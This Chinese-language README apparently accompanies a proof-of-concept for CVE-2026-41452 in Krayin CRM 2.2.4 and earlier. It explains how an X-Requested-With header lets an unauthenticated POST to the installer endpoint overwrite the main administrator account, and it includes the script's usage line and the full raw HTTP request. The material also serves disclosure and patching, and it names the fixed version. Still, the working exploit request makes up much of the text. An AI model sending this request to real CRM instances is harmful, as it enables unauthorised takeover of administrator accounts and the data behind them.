一个概念验证(PoC),演示了影响 Krayin CRM 2.2.4 版本及更早版本的一个严重缺失身份验证漏洞(CVE-2026-41452)。
该漏洞允许未经身份验证的远程攻击者通过注入特定的 HTTP 头来绕过应用程序的安装中间件逻辑(CanInstall),从而完全覆盖主管理员账户配置。
[!WARNING]
免责声明: 本仓库及其中包含的信息仅供教育目的、安全研究和授权防御性审计使用。未经授权测试或利用计算机系统是严格违法的。作者对本材料的任何滥用不承担任何责任。
CVE ID: CVE-2026-41452
漏洞类型: 缺失身份验证 / 中间件绕过
严重程度: 严重(CVSS 9.8)
受影响软件: Krayin CRM <= 2.2.4
已修复版本: Krayin CRM >= 2.2.5
该漏洞存在于应用程序的安装中间件中。未经身份验证的攻击者可以向针对 /install/api/admin-config-setup 端点的特制请求附加 X-Requested-With: XMLHttpRequest 头。这会抑制 CanInstall 中间件中预期的重定向检查,从而暴露一个未经身份验证的 updateOrInsert 数据库操作,该操作针对主系统管理员的硬编码 ID(1)。
在您有权测试的目标实例上运行该脚本:
./poc.sh <TARGET-URL> <USERNAME> <EMAIL> <PASSWORD>
在底层,该绕过通过以下 HTTP 事务结构触发:
POST /install/api/admin-config-setup HTTP/1.1
Host: target-crm.local
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
name=test1&[email protected]&password=Password123